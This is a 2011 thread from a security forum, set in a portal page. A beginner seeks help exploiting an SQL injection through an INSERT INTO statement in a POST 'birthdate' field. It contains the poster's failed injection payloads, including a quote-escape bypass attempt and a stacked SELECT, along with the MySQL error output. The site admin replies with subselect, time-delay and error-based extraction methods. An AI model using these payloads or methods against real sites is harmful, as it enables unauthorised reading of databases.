Waraxe IT Security Portal
Login or Register
July 14, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 247
Members: 0
Total: 247
Full disclosure
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
SEC Consult SA-20240620-0 :: Arbitrary File Upload in edu-sharing (metaVentis GmbH)
Zip Slip meets Artifactory: A Bug Bounty Story
Backdoor.Win32.Plugx / Insecure Permissions
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Need assistance exploiting 'INSERT INTO' post sql injection
Post new topicReply to topic View previous topic :: View next topic
Need assistance exploiting 'INSERT INTO' post sql injection
PostPosted: Tue Jul 05, 2011 12:07 am Reply with quote
BlueScreenOfDoom666
Regular user
Regular user
Joined: Jan 06, 2008
Posts: 5
Location: -




INSERT INTO tablename ( field1, field2, field3, exploitable_field, field5 ) VALUES( 'val1', 'val2', 'val3', '??????', 'val5' )


I've been trying to inject a query into "exploitable_field" and grab the contents of tablename, however, whenever I post the query, the server just spits out a "Query failed: errno = 1064, error = You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "<my sql queries> --[rest of variable exploitable_field]" at line <line number>

query= < ... >


I patched the rest of the values in the original query with empty fields, "''" aka "0xbf5c0xbf5c", until the statement was finished, and then added my query followed by a double dash comment.



valid query:
Code:

INSERT INTO site_infotable ( nickname, email, timezone, birthdate, ipaddress ) VALUES ( 'anon', 'abcd@ef.gh', '-12', '1980', '127.0.0.1' )


my code to inject:
Code:

SELECT * FROM site_infotable


my attempt that isn't working (inside the post data):
Code:

&birthdate=0xbf5c0xbf5c, 0xbf5c0xbf5c) AND SELECT * FROM site_infotable --



resulting error:
Code:

Query failed:
errno = 1064
error = You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' AND SELECT * FROM site_infotable --, '127.0.0.1' at line 2

query=INSERT INTO site_infotable ( nickname, email, timezone, birthdate, ipaddress ) VALUES ( 'anon, 'abcd@ef.gh', '-12', 0xbf5c0xbf5c, 0xbf5c0xbf5c) AND SELECT * FROM site_infotable --, '127.0.0.1' )




Note the 0xbf5c are supposed to be single quotes ( ' ), as they were being prefixed with a slash ( \ ) [ magic quotes? ].


I'm not sure what I'm doing wrong. If anyone could help me with this that would be great.
Note that I'm a beginner and this is my first attempt. I've been trying this for hours, and googled and googled and googled more, and failed.
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
PostPosted: Tue Jul 05, 2011 11:41 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




More information is needed.

1. Attack goes through POST request? How do you manipulate POST parameters?
Do you use "Tamper Data", handcrafted html files or other method?

2. Attack vector is POST parameter "birthdate"? Is it suppose to be
integer or string? Do you need single quotes for sql injection or exploitation
is possible without single quotes?

If you can, then let me see the POST request you use.

Anyway, there is mainly two methods for INSERT INTO sql injection exploitation.

1. injection of useful data to the database and then reading it, if possible.
For this you need to use subselects.

2. alternative method is time delay based or error feedback based exploitation.
You can use BENCHMARK() or SLEEP() with subqueries and IF()
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 06, 2011 1:20 pm Reply with quote
BlueScreenOfDoom666
Regular user
Regular user
Joined: Jan 06, 2008
Posts: 5
Location: -




I'm using my own C# application to send a POST request.

The post data I'm sending looks like this:
Code:

&nickname=anon&email=abcd@ef.gh&timezone=-12&birthdate=


"&birthdate=" is the string field where the sql injection goes.

Everything I've tried has resulted in a bad syntax error.
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
PostPosted: Wed Jul 06, 2011 1:39 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




BlueScreenOfDoom666 wrote:
I'm using my own C# application to send a POST request.

The post data I'm sending looks like this:
Code:

&nickname=anon&email=abcd@ef.gh&timezone=-12&birthdate=


"&birthdate=" is the string field where the sql injection goes.

Everything I've tried has resulted in a bad syntax error.


I repeat the question - do you need to use single quotes for this exploit?
I mean, if birthdate=foobar, there is sql error?
Or you need to use birthdate=foo'bar ?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 06, 2011 1:44 pm Reply with quote
BlueScreenOfDoom666
Regular user
Regular user
Joined: Jan 06, 2008
Posts: 5
Location: -




waraxe wrote:
BlueScreenOfDoom666 wrote:
I'm using my own C# application to send a POST request.

The post data I'm sending looks like this:
Code:

&nickname=anon&email=abcd@ef.gh&timezone=-12&birthdate=


"&birthdate=" is the string field where the sql injection goes.

Everything I've tried has resulted in a bad syntax error.


I repeat the question - do you need to use single quotes for this exploit?
I mean, if birthdate=foobar, there is sql error?
Or you need to use birthdate=foo'bar ?


Oh oops, didn't see that. I've been trying to use the single quotes ( ' ). The server inserts a slash ( \ ) infront of the quote so it becomes a ( \' ), and I tried to bypass that by using 0xbf5c, but it didn't work.
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
PostPosted: Wed Jul 06, 2011 1:48 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




If you try:

Code:

birthdate=1234


do you get sql error message?

And if you try:

Code:

birthdate=abcd


do you see sql error message?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 06, 2011 1:51 pm Reply with quote
BlueScreenOfDoom666
Regular user
Regular user
Joined: Jan 06, 2008
Posts: 5
Location: -




waraxe wrote:
If you try:

Code:

birthdate=1234


do you get sql error message?

And if you try:

Code:

birthdate=abcd


do you see sql error message?



Nope, abcd works just fine. The requests goes through without a problem.
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
PostPosted: Wed Jul 06, 2011 1:59 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




OK, then show me the string, that will provoke sql error message.
And let me see that error message.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 06, 2011 2:13 pm Reply with quote
BlueScreenOfDoom666
Regular user
Regular user
Joined: Jan 06, 2008
Posts: 5
Location: -




Code:

&nickname=anon&email=abcd@ef.gh&timezone=-12&birthdate=a', '127.0.0.1'); SELECT * from site_infotable --


Code:

Query failed:
errorno=1064
error=You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\', \'127.0.0.1\'); SELECT * from site_infotable --, '127.0.0.1' at line 2
query=INSERT INTO site_infotable ( nickname, email, timezone, birthdate, ipaddress ) VALUES ( 'anon, 'abcd@ef.gh', '-12', a\', '127.0.0.1'); SELECT * FROM site_infotable --, '127.0.0.1')
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
PostPosted: Wed Jul 06, 2011 2:39 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This error message seems to be missing some single quotes ...
Anyway, do you have access to the information from that INSERT query?
I mean - if you INSERT birthdate=blah, then can you open web page, that will show birthdate you just inserted?
If you have such feedback possibility, then you can use it for fetching needed information from target database.
Of course, you must fist know, if birthdate field in database table is numeric or string and how much information can it store.
So let me know, if you can see inserted birthdate or ipaddress after POST query.
View user's profile Send private message Send e-mail Visit poster's website
Need assistance exploiting 'INSERT INTO' post sql injection
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.143 Seconds